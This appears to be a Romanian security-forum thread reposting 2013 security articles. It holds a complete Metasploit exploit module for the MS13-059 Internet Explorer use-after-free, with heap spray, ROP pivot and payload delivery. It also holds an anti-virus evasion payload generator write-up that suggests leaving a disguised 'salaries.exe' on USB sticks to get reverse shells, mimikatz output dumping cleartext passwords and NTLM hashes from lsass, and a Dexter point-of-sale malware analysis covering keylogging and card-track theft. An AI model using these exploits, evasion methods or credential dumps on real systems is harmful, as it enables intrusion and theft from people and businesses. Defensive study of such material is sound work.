TOR Should not be solely Used for privacy Posted by: FastFlux September 5, 2013 The Tor network has been getting a lot of attention lately. About two weeks ago, the number of users on the anonymous network mysteriously doubled, hitting a record high. It could be because of the new Pirate Bay’s new Tor-powered browser. It could also be a result of recent web censorship by the Russian government. Or it could be new malware that is utilizing the network to hide their Command and Control (C&C) servers. A new report from the US Naval Research Laboratory and Georgetown University in Washington DC called “Users Get Routed: Traffic Correlation on Tor by Realistic Adversaries.” Researchers claim that It is not very difficult to expose the bulk of user’s identities if an attacker is willing to put in the time and effort, according to the Register. It’s even easier for government and spy agencies that have money to do so. So, how bad is the security risk? The study found that even if an attacker had no control routers, 80 percent of Tor users could be de-anonymized within six months. With control of one exchange point, or autonomous systems (AS), around 100 percent of users were likely to be uncovered, within three months. With two, it could take just one day. “These results are somewhat gloomy for the current security of the Tor network,” researchers wrote, adding that “Current users of Tor should carefully consider if it meets their security needs.” Sursa: http://zerosecurity.org/technews/tor-solely-privacyTOR Should not be solely Used for privacy

[h=3]Point-of-Sale Malware: Infostealer.Dexter[/h] Haven't posted since a while so let's do something... Back on some old material, due to a 'recent' compromission of off-sho.re servers, and the circulation between AVs of Cyberbunker sinkholes logs. (Especially the Alina connections was interesting, but that not the topic) Did you remember Dexter ? nah not the TV Series, but the PoS Malware. Systems infected by Dexter are various in our case (gas stations, pawn shops, logistics, luxury shops, doctors, clinics, pharma, labs, etc...) This malware was coded by a guys know as 'dice' (there was an advert on Darkode made by him around November 2012 if i remember, but he requested an admin to remove the thread so it's not anymore available) Visa USA have released an alert one month after. Sample who come from the compromised server: Let's see so, i will avoid you the Visual Basic 6 unpacking step, if you want the hashs. Original: bb0b17c2f66a868cf1e8a46626366a32 Depack: e74593552b66a4638b80a4fbf2fb7438 Create a mutex: Determine if we are under x64: Creat a suspended process of IE: Copy the EXE in memory: WriteProcess Memory on Internet Explorer with the content of the exe: Then he a do a CreateRemoteThread on IE and ExitThread on this process. Ok, what's happend with the injected IE ? I've patched the executable by taking some jumps he have not took at the begining to make it think we are in IE and see what's happend. Create a subkey 'HelperSolutions Software': Create a folder %APPDATA%/Java Security Plugin then CopyFile and do a DeleteFile on the original exe. Do a RegCreateKey/RegSetValue/RegCloseKey with 'digit' as registry entry and 'cc98afca-1a04-4c5d-80cf-1cc78244b63e' as value for me. Create a registry persistance 'Sun Java Security Plugin': Do the same but this time in HKCU: Create another registry entry but this time: HKCU Software\Microsoft\Windows\CurrentVersion\Policies\Associations With 'LowRiskFileTypes' and '.exe;.bat;.reg;.vbs;' as value The 'Policies\Associations' subkey lets you manage the default risk level for file attachments (Low-risk/Medium-risk/High-risk file types) The attachment manager in windows can help protect your computer from unsafe attachments that you might receive with an e-mail message and from unsafe files that you might save from the Internet. Edit a value at HKCU: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 Registry entry '1806' and '0' as value '1806' is the registry entry about launching applications and unsafe files in internet explorer. The value can be zero, one, or three, typically, a setting of zero sets a specific action as permitted, a setting of one causes a prompt to appear and a setting of three prohibits the specific action. Do the same operation but in HKLM this time: The file initialyse a thread: Extract a ressource: Create a DLL 'SecureDll.dll' with the extracted ressource and attribute Hidden: Load the dll: Create a path: Create a reg key at Software\HelperSolutions Software 'val1' and with value 'C:\Documents and Settings\Administrateur\Bureau\strokes.log' Create a second reg key at Software\HelperSolutions Software 'val2' and with value 'C:\Documents and Settings\Administrateur\Bureau\tmp.log' Hook the keyboard: Refer to the MSDN for explanation: Okay... let's have a look on what's this SecureDll.dll do, seem it's not that secure. Look for previous reg key: val1 and val2. Look for some specific process who run on the system: Here is a list: wmiprvse.exe (Microsoft Windows Management Instrumentation) LogonUI.exe (Windows LogOn User Interface) svchost.exe (Service Host Process) iexplore.exe (Internet Explorer) explorer.exe (generic Windows process) System (Internal Windows system process) smss.exe (Session Management Subsystem) csrss.exe (Client/Server Runtime Subsystem) winlogon.exe (Windows LogOn Process) lsass.exe Local (Security Authority Subsystem Service) spoolsv.exe (Printer Spooler Service) alg.exe (Application Layer Gateway) wuauclt.exe (Windows Update client for WindowsME) firefox.exe chrome.exe devenv.exe (Microsoft Visual Studio) Then he start to open process and look for track1/2/3 And when finaly something is detected: Make it as string: After looking at all process he will create some threads: The first will just do a new scan of process. Second thread make sure everything is ok with the registry key 'run' Tree do a loop 4 detect if the pc will got shutdown (i've not looked but DetectShutdownClass seem enought explicit) Then he start to enter in a procedure to call home: Get user name: Get the computer name: Get the OS version: Architecture: Retrieve the string used to identify the machine who was stored on the registry database (cc98afca-1a04-4c5d-80cf-1cc78244b63e) Open strokes.log and read it Then Delete it: Read the content of tmp.log: Enter in a decode routine: Create a file Debug.log: Write it: And delete tmp.log: Take our hwid and enter on the routine to code it: Then he will do that again but with the process name he grabbed tracks info, take also pc infos etc... From the original source code: At the end we have a huge strings like: page=RUUZTk9FSURRTk1OHVFIGBhJUUQYRUpRSkQaTUwYSUhNTx0f&ump=ACgZHREqFRkLGQ4jLxkOChUfGVIZBBlGR0hNTU1NTU1NTU1NTU1NTU1BTU9MS01MTUxMTExMTExMTExKSkpDWT5ITU1NTU1NTU1NTU1NTU1NIiQlMDU+MyRTMD0+L1wxLiJNT0xLTUxNTExMTExMTExMTExMTExMTExMTExKSkpMTE C&C domain and gate path are given via pointers due to the internet explorer injection. After having called the gateway, then Dexter do a 600000 ms sleep (10 mins): And do the shit again, then re-call home each 10 mins. Now about the C&C responses, i noticed these actions update- chekin: scanin: unistall download- I've not searched how works the following commands, Josh Grunzweig of SpiderLabs already explained it. So... enough boring reversing infos, let's have a look on the panel now. Login: Dashboard: More than 3000 bots, most of them are commercial machines. Like Alina, Dexter use colors code, dead bots appear in red and recent dead bots in blue: Dumps (stolen credit cards): Keylogger logs (here, that seem to be a UPS dispatch center, or something like this): Process viewer (not working): Another but small Dexter panel: I've found also an older version of Dexter, i thought it was Alina at first but nope, Dexter v1: Dashboard: Dumps: Bots: Process list (this time it work): Uploader was not found due to a programming error: Dexter 'v2' C&C structure: Just ignore the 'installer' folder that something homemade for a video .Get track type function: That even grab track3. 600 posts reached Posted by Steven K at 23:09 Sursa: XyliBox: Point-of-Sale Malware: Infostealer.Dexter

Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow Authored by Vitaliy Toropov | Site packetstormsecurity.com A heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. The exploit for this vulnerability is javascript code which shows how to use it for memory corruption of internal JS objects (Unit32Array and etc.) and subsequent arbitrary code execution (custom ARM/x64 payloads can be pasted into the JS code). This exploit affects Apple Safari version 6.0.1 for iOS 6.0 and OS X 10.7/8. Earlier versions may also be affected. It was obtained through the Packet Storm Bug Bounty program. Download: http://packetstormsecurity.com/files/download/123088/PSA-2013-0903-1-exploit.tgz Sursa: Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow ? Packet Storm

MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free Authored by corelanc0d3r, sinn3r | Site metasploit.com This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This Metasploit module can be used against version 9.0.8112.16446, but not for 9.0.8112.16421. IE 8 requires a different way to trigger the vulnerability, but not currently covered by this module. The issue is specific to the browser's IE7 document compatibility, which can be defined in X-UA-Compatible, and the content editable mode must be enabled. An "onmove" event handler is also necessary to be able to trigger the bug, and the event will be run twice before the crash. The first time is due to the position change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable' object is created during a "SelectAll" command, and this object will be used later on for the crash. The second onmove event seems to be triggered by a InsertButton (or Insert-whatever) command, which is also responsible for the free of object CFlatMarkupPointer during page rendering. The EnsureRecalcNotify() function will then still return an invalid reference to CFlatMarkupPointer (stored in EBX), and then passes this on to the next functions (GetLineInfo -> QIClassID). When this reference arrives in function QIClassID, an access violation finally occurs when the function is trying to call QueryInterface() with the bad reference, and this results a crash. Successful control of the freed memory may leverage arbitrary code execution under the context of the user. Note: It is also possible to see a different object being freed and used, doesn't always have to be CFlatMarkupPointer. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, 'Name' => "MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free", 'Description' => %q{ This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version 9.0.8112.16446, but not for 9.0.8112.16421. IE 8 requires a different way to trigger the vulnerability, but not currently covered by this module. The issue is specific to the browser's IE7 document compatibility, which can be defined in X-UA-Compatible, and the content editable mode must be enabled. An "onmove" event handler is also necessary to be able to trigger the bug, and the event will be run twice before the crash. The first time is due to the position change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable' object is created during a "SelectAll" command, and this object will be used later on for the crash. The second onmove event seems to be triggered by a InsertButton (or Insert-whatever) command, which is also responsible for the free of object CFlatMarkupPointer during page rendering. The EnsureRecalcNotify() function will then still return an invalid reference to CFlatMarkupPointer (stored in EBX), and then passes this on to the next functions (GetLineInfo -> QIClassID). When this reference arrives in function QIClassID, an access violation finally occurs when the function is trying to call QueryInterface() with the bad reference, and this results a crash. Successful control of the freed memory may leverage arbitrary code execution under the context of the user. Note: It is also possible to see a different object being freed and used, doesn't always have to be CFlatMarkupPointer. }, 'License' => MSF_LICENSE, 'Author' => [ 'corelanc0d3r', # Vuln discovery, PoC 'sinn3r' # Metasploit ], 'References' => [ [ 'CVE', '2013-3184' ], [ 'OSVDB', '96182' ], [ 'MSB', 'MS13-059' ], [ 'BID', '61668' ], [ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-13-194/' ], [ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-13-195/' ] ], 'Platform' => 'win', 'Targets' => [ # Vulnerable IE9 tested: 9.0.8112.16446 [ 'Automatic', {} ], [ 'IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)', {} ] ], 'Payload' => { 'BadChars' => "\x00", 'StackAdjustment' => -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, 'DisclosureDate' => "Jun 27 2013", 'DefaultTarget' => 0)) end def rnd_dword rand_text_alpha(4).unpack("V").first end def get_fake_obj # edx,dword ptr [eax] # ... # call edx obj = [0x20302020].pack("V*") # EAX points to this (Target spray 0x20302020) obj << [rnd_dword].pack("V*") obj << [rnd_dword].pack("V*") obj << [rnd_dword].pack("V*") obj << [rnd_dword].pack("V*") return obj end # Target spray 0x20302020 # ESI is our fake obj, with [esi]=0x20302020, [esi+4]=0x42424242, so on # eax=20302020 ebx=80004002 ecx=0250d890 edx=cccccccc esi=03909b68 edi=0250d8cc # eip=cccccccc esp=0250d87c ebp=0250d8a8 iopl=0 nv up ei ng nz na po cy # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010283 # cccccccc ?? ??? def get_payload code = '' code << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000 code << "\x61\x9d" # popad; popfd code << payload.encoded stack_pivot = [ 0x7c342643, # xchg eax, esp; pop edi; add [eax], al, pop ecx; ret 0x0c0c0c0c ].pack("V*") p = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) return p end def is_win7_ie9?(agent) (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\.1/) end # The meta-refresh seems very necessary to make the object overwrite more reliable. # Without it, it only gets about 50/50 def get_html(cli, req) js_fake_obj = ::Rex::Text.to_unescape(get_fake_obj, ::Rex::Arch.endian(target.arch)) js_payload = ::Rex::Text.to_unescape(get_payload, ::Rex::Arch.endian(target.arch)) html = %Q| <html> <meta http-equiv="X-UA-Compatible" content="IE=7"/> <meta http-equiv="refresh" content="2"/> <head> <script language='javascript'> #{js_property_spray} var fake_obj = unescape("#{js_fake_obj}"); var s = unescape("#{js_payload}"); sprayHeap({shellcode:s}); function setupPage() { document.body.style.position = 'absolute'; document.body.contentEditable = 'true'; document.body.style.right = '1'; } function hitMe() { document.execCommand('SelectAll'); document.execCommand('InsertButton'); sprayHeap({shellcode:fake_obj, heapBlockSize:0x10}); document.body.innerHTML = '#{Rex::Text.rand_text_alpha(1)}'; } </script> </head> <body onload="setupPage()" onmove="hitMe()" /> </html> | html.gsub(/^\t\t/, '') end def on_request_uri(cli, request) if is_win7_ie9?(request.headers['User-Agent']) print_status("Sending exploit...") send_response(cli, get_html(cli, request), {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) else print_error("Not a suitable target: #{request.headers['User-Agent']}") send_not_found(cli) end end end Sursa: MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free ? Packet Storm

[h=1]Federal Friday - 8/30/2013: DHS/FBI Highlight The Importance Of Keeping Android Devices Updated[/h]Posted by Sajal Sahay in Information Security on Aug 30, 2013 3:08:58 PM A memo sent to Police, Fire and EMS personnel nationwide from the FBI and Department of Homeland Security earlier this summer, was recently made public. According to the memo, the Android operating system is the primary target for mobile malware attacks. At face value, this would not be surprising given that Android commands ~ 80% market share in the US, so should proportionally experience the largest number of malware attacks. However, the same report says that iOS was targeted < 1% of the time, which is well below Apple’s market share. So, what’s the difference? The real insight comes later in the report. “Industry reporting indicates 44% of Android users are still using versions 2.3.3 through 2.3.7 – known as Gingerbread – which were released in 2011 and have a number of security vulnerabilities that were fixed in later versions.” Rapid7’s mobile customer database shows that 49% of Android devices contain at least one high severity vulnerability, aligning closely with the % of devices with older versions of OS still running on them. So, the most effective way for organizations to eliminate these vulnerabilities is to ensure all employee devices are updated to the latest OS version. However, because the mobile ecosystem is so complex and OS updates require coordination between handset manufacturers, OS vendors and carriers, these updates can sometimes take months to deploy and create large windows of risk. Even the ACLU has gotten involved, accusing the major US carriers of deceptive business practices due to untimely updates of Android devices. See our previous blog on this topic. Rapid7 has an answer to this problem. Our Mobilisafe mobile risk management solution makes it easy for organizations to help their employees update their devices. Mobilisafe identifies the mobile devices connecting to organizational data, and assesses each device for its vulnerability risk and if they are eligible for an OS update. For those devices that can be updated, Mobilisafe automatically sends emails to the employee, with direct links to the OEM site where the device update can be completed. Policies can also be created that block devices from accessing organizational data if the update is not completed within a set period of time. For a free demo of Mobilisafe, click here, and our usual Federal Blogger John Schimelpfenig will be back next week. Sursa: https://community.rapid7.com/community/infosec/blog/2013/08/30/dhsfbi-highlight-the-importance-of-keeping-android-devices-updated

[h=1]Rapid7 Free Tools - Download Today![/h]Posted by Patrick Hellen in Information Security on Aug 30, 2013 12:06:08 PM Hello all, It’s your friendly neighborhood Community Manager again, this time reaching out to talk about something that should be of interest to all of you; Rapid7’s suite of Free Security Tools. If you're a one man shop, trying to make sure you're as buttoned up as possible, or a giant organization just looking to do some validation and double checking, I’m sure one or more of these tools would be an excellent addition to your existing security portfolio. Here’s a list of our own Portfolio. Click on the links to get some additional information, and to download the licenses. Nexpose Community Edition: Our original tool - Nexpose is a vulnerability scanning software that is the best in the business. Don't take my word for it though. To see how excellent it is, download the community edition, and test it out for yourself, on your own networks. We're pretty sure that if you're looking for an enterprise tool, the taste-test available with the community edition will be more than enough to prove it's value. Metasploit Community Edition: Metasploit, our penetration testing tool, is the perfect piece of software for both pen testing your networks, and validating the findings of your latest vulnerability scan. Also, if you're looking to teach yourself how to be a pen tester, the only way to learn, really is to do. Download our community edition, start your testing, and interact with other pen testers here on SecurityStreet to learn more. Mobilisafe 14-day Trial: Are you looking to better understand the risks that you're facing with BYOD? Want to mitigate the risks associated with employees who keep forgetting to update or patch their own devices? Try out our free Mobilisafe 14 day trial, and learn how easy it is to keep the risk of the mobile devices on your network low. RiskRater: Our newest free tool, RiskRater is a survey that will measure your mobile, endpoint, and user based risk, in comparison to industry benchmarks. We asked, and over 600 organizations answered our 18 question survey, to help us set up the benchmarks. You can use this tool to see how your own security stance and configurations compares. Also, each question you answer provides you with real and actionable follow up tasks that can help address the risk that you helped expose in your survey. We're not going to save or share your information, and there's nothing to download - just click to launch the tool, and get a good spot check on your real risk. Metasploitable: If you're new to Penetration Testing, and you're just starting to learn Metasploit, you don't want to test something out on your production network. Having to explain to your boss why critical system # 1 is down is not an ideal conversation to have. To address this, the Metasploit team developed Metasploitable. This is a safe, and intentionally vulnerable virtual machine that you can run pen tests against to make sure you understand how to best use the exploits at your disposal. The Metasploit team calls it a, "pen test in a box," so if you'd like to try it out, please download our VMware virtual machine here and get started. ScanNow - MySQL: The MySQL Vulnerability CVE-2012-2122, best described in HD Moore post here, is quite a risk, allowing every 256th login regardless of password. If you'd like to quicky and easily check to see if your MySQL servers are vulnerable, just click and download and run the test yourself. ScanNow - UPnP: This free ScanNow scanner checks your network enabled devices to see if they are vulnerable to an attack via UPnP. This blog and whitepaper from Rapid7 and HD Moore estimates upwards of 50 Million network devices are at risk because of vulnerabilities found in this protocol. Click and download this free tool, to see if you're one of the millions of people affected by this, and what you can do to make sure you close this potential damaging security flaw. UPnP Router Check: Want a quick router scan to check on the status of UPnP enabled devices? Click here and run a scan quickly and easily. This will only check your router exposure, so make sure to download the free ScanNow UPnP tool listed above to check your internal status. And finally, BrowserScan: This free tool enables your organazation to check on the browsers currently in use, and allows you to identify the risk of out of date items, unpatched plug-ins, and can even restrict access to sensitive information until a fix or upgrade is secured. It's as simple as embedding a tracking code on your internal site, to look up all the browsers in use, and can even return analytics to show you how you're addressing your risk over time. I also recommend that you check out Kali Linux - by Offensive Security, the same team that brought you Backtrack. Kali Linux, the upgraded Backtrack, is a debian derived Linux distrubition that was designed for both pen testing and digital forensics. Kali is full of open source tools that you can use to test your own networks including nmap, Wireshark, John the Ripper, and Aircrack-ng. Due to a partnership between Offensive Security and Rapid7, a specially designed license of Metasploit is available as an internal component to the download. Visit Offensive Security to learn more. All of these tools, as I mentioned, are 100% free to download and use. Most of them are so user-friendly, it can take as little as 10 seconds in some cases to find at your level of risk regarding a specific vulnerability. My own philosophy on using these tools? If anything can make it harder for an attacker to gain access, then it's worth taking a shot, and if it's free, it's worth a small amount of your time, isn't it? Now I know that's a lot to take in and review, so if you've got any questions about these products - or if you're currently using them, and you'd be willing to share some of your best practices or tips on how they've worked sucessfully in your own environments, please let us know! You can drop us a line here, and include some info on what you're working on, and we would love to discuss any findings or feedback you have. Finally, if you've got a great idea for another free tool that we could develop, please let us know. Who knows? If we do design it, maybe we'll name it after you? Thanks all, and feel free to drop me a line here if you'd like to discuss offline Patrick Hellen Sursa: https://community.rapid7.com/community/infosec/blog/2013/08/30/rapid7-free-tools--download-today

AV0id – Anti-Virus Bypass Metasploit Payload Generator Script by Common Exploits Introducing a simple script I have created to bypass most Anti-Virus products. This script is based on scripts I used whilst attempted to avoid A.V, credit to all authors of the mentioned scripts below for their research and work. This was just a very quick script I put together to make life a bit easier. What it does it generator a Metasploit Meterpreter payload executable automatically for you. It auto changes the icon to a PDF and also auto creates AutoRun files. So you can then use this file via a shell upload to get a reverse shell via Metasploit, place on a USB stick for some social engineering/Phishing attacks, or burn to a CDROM for some AutoRun fun. There are many good tools/scripts around, but a lot of these are now detected by most Anti-Virus products. On a recent laptop assessment I was getting blocked by McAfee attempting a AutoRun exploit and most tools and encoding would not get round this, so I decided to knock up a quite script that did get round it. Even if you are not looking to get around A.V, or this gets detected more in the future it is a very easy script to generate you a quick Meterpreter payload for your local or remote listener. Some screen shots, download path and A.V bypass script comparisons below. At its best my script was only detected by 10 out of 46 Anti-Virus products, these depends on which stealth option you use. At its lowest it was about 14/15 A.V products found this. This is still bypasses 20+ more products than just encoding the payload using Mfsencode or Msfvenom. It uses Msfencode, but also pads the file and re-compiles the executable including a PDF icon. The file size and contents are never the same for every executable generated, this helps it avoid most Anti-Virus products. The more intelligent A.V products will still pick it up. Download from the NCC Open Source GitHub Repository below: https://github.com/nccgroup/metasploitavevasion Tested on Backtrack 5 and Kali only. Run as root. Exploit on victim now opens minimised, thanks to @redmeat_uk for the info. It requires two very small files in order to create the PDF icon and AutoRun files. It will auto download these if they are not within the directory. If it can’t download them it will continue, but it will not create the PDF icons. If you want to download these two files in advance, just get them below. Place in the same directory as the script is stored. If you want to change the autorun.ico for your own icon this will change the autorun icon. To change the exe icon is a little more complex and is compiled from the icon.res file. Google around and you can create this using windres. wget http://www.commonexploits.com/tools/avoid/autorun.ico MD5 checksum: ebe763172e90b7f218d522b13abbc5c1 wget http://www.commonexploits.com/tools/avoid/icon.res MD5 checksum: 876caf8703c803d7a2359103adc9ce58 Select local system or remote. If you select local it will auto grab your local IP address and use that. If you select alternative, it will ask you which IP address to listen on, then give you the msf listener code to run at the end. Enter the port number to listen on. If local it doesn’t really matter, but if external they may have some restrictions so try port 80, 443 or 53. A recent test I found workstations could talk directly outbound on DNS/53, so I could get a AutoRun shell out to the internet. There are 5 options for the payload. The more stealthy the bigger the file. All this is doing is padding out with more random junk, which seems to reduce the detection ratio slightly. If size is not an issue i.e using a CD or USB then try the most stealthy option for better results. I have not tested option 5 on online scanners as it exceeds the upload limit. It then saves you out the executable named salaries.exe, you can change the name in the top of the script header. You could use this and place on a few USB sticks and leave around the building, I am sure curious staff may want to open, and as it has a PDF icon it helps. It also creates you an autorun directory, simply burn these to a CDROM to try a AutoRun shell or a U3 USB – normal USB sticks won’t AutoRun and obviously if the system has AutoRun disabled it will not work. It will then launch the listener locally. Or if you selected an alternative system, it will give you the code to copy and paste to start the listener. Then run the exploit and you will get your shell. In this case the AutoRun exploited without any user interaction. I run this over 46 Anti-Virus products and got fairly good results. Below is a comparison I made with the most commonly known and used A.V avoidance tools and scripts. Standard Metasploit payload (encoded) Shell Code Exec Vanish Script AV0ID Syringe Quick high level view on the above scripts. Shell Code Exec Great tool created by Bernardo Damele that did get round almost all A.V products. The shellcode exe now does get detected more as this file stays the same. Bernardo allows you to download the source code, so I believe a quick modification to the file and a recompile would get round this. Info here: Bernardo Damele A. G.: Execute Metasploit payloads bypassing any anti-virus Download here: https://github.com/inquisb/shellcodeexec This is also built into SET (Social Engineering Toolkit) under the media generator options. Vanish Script Great script that inspired my script. Created originally by Astr0baby in 2011 and modified by Vanish3r that generates the Metasploit payload for you. It is getting more detected now. Download here: [bash] Vanish Script - Pastebin.com Syringe This works in a very similar way to Shellcode exec, but I found this to be very good and got round a lot of A.V products. This was the only tool that got around Microsoft A.V in my testing. Download here: https://code.google.com/p/syringe-antivirus-bypass/ Sursa: AV0id – Anti-Virus Bypass Metasploit Payload Generator Script | Common Exploits - Penetration Testing Information

[h=1]mimikatz: Tool To Recover Cleartext Passwords From Lsass[/h] I meant to blog about this a while ago, but never got round to it. Here’s a brief post about very cool feature of a tool called mimikatz. I’m very grateful to the tool’s author for bringing it to my attention. Until that point, I didn’t realise it was possible to recover the cleartext passwords of logged on windows users. Something that I’m sure most pentesters would find very useful. Here’s some sample output provided by the author: mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */ mimikatz # privilege::debug Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # inject::process lsass.exe sekurlsa.dll PROCESSENTRY32(lsass.exe).th32ProcessID = 488 Attente de connexion du client... Serveur connecté à un client ! Message du processus : Bienvenue dans un processus distant Gentil Kiwi SekurLSA : librairie de manipulation des données de sécurités dans LSASS mimikatz # @getLogonPasswords Authentification Id : 0;434898 Package d'authentification : NTLM Utilisateur principal : Gentil User Domaine d'authentification : vm-w7-ult msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c } wdigest : password tspkg : password Authentification Id : 0;269806 Package d'authentification : NTLM Utilisateur principal : Gentil Kiwi Domaine d'authentification : vm-w7-ult msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a } wdigest : waza1234/ tspkg : waza1234/ I wondered why the cleartext password would need to be stored in LSASS – after all every pentester will tell you that you don’t need the password to authenticate, just the hash. A bit of googling seems to indicate that wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Tool: mimikatz | Blog de Gentil Kiwi Sursa: mimikatz: Tool To Recover Cleartext Passwords From Lsass | pentestmonkey

Netbeans, Eclipse? Cica asta ar fi smecher, dar e trial: http://www.jetbrains.com/idea/download/ Nu l-am incercat.